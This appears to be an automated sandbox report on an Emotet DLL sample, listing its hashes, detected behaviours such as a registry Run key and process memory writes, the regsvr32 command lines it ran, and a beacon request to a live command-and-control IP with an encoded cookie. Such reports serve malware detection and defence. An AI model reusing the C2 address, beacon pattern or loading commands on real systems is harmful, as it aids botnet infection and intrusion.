Analysis

  • max time kernel
    52s
  • max time network
    103s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    02/11/2022, 23:01 UTC

General

  • Target

    a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll

  • Size

    629KB

  • MD5

    c9c69f06d8578c13ba70f7ab1f793da7

  • SHA1

    d9b3f7517277c896c8733f79f26c3dc7091ad58f

  • SHA256

    a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb

  • SHA512

    1ba2b828b31d0fd712343fac529f5d82ff4cfce1dffd47ea52c3b58db2e5db28f090f3a597600d255d27127c51232be9999c6a8f38e96d44356a1e510fe8f9d0

  • SSDEEP

    12288:6tGis7p49VmD3OjG7QbBtLu5WhNye5JHKVu6cig1Doa:6tGis1T3OjueLhhd5NKAD3

Malware Config

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\a25157f686cfce09013798a272c14097fa2ddb0ef1d1a5b2fc77c00d7dfc41cb.dll
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\system32\regsvr32.exe
      C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MyNzhzM\bxLPxWBKtzwOqdi.dll"
      2⤵
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      PID:2780

Network

  • flag-kr
    GET
    https://182.162.143.56/
    regsvr32.exe
    Remote address:
    182.162.143.56:443
    Request
    GET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: QTBd=BSTjci69ZUIM9QyTgkqxfK5UzzzYgM8fyZhp0TRO/pwD6XJYxD9J+3fJB3kVQeZZOu9MmOMX+u7uuBPwSJ0nYInzaF39AbprHFuE2VCxyNFfj1qoZUpHcI8V0t6jnvDYQUvMOU8Ph0RuNLGEbDFH9Kvph8ZpT3XTWnsi/4ZYmM+tzWLEqg+OTYMjT92y6T14yUlpZyvJuV0kH1p6wgAevpCsraiGwG9nk8BkOuLSoSeSyC1SPBaDl/7Hi42cw7mPk3Qj1AvoOrV10CdpdCrtcaDcyhHDwlTrNv9YEXcwlnlWE8MYaE8SsQLDELpiljkrddXRoQwJfwmUpDzf/7UzgirYbQfqjJU=
    Host: 182.162.143.56
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 02 Nov 2022 23:02:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • 13.69.109.131:443
    322 B
    7
  • 8.252.118.126:80
    322 B
    7
  • 182.162.143.56:443
    https://182.162.143.56/
    tls, http
    regsvr32.exe
    1.2kB
    2.7kB
    11
    10

    HTTP Request

    GET https://182.162.143.56/

    HTTP Response

    200

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2496-117-0x0000000180000000-0x000000018002F000-memory.dmp

    Filesize

    188KB
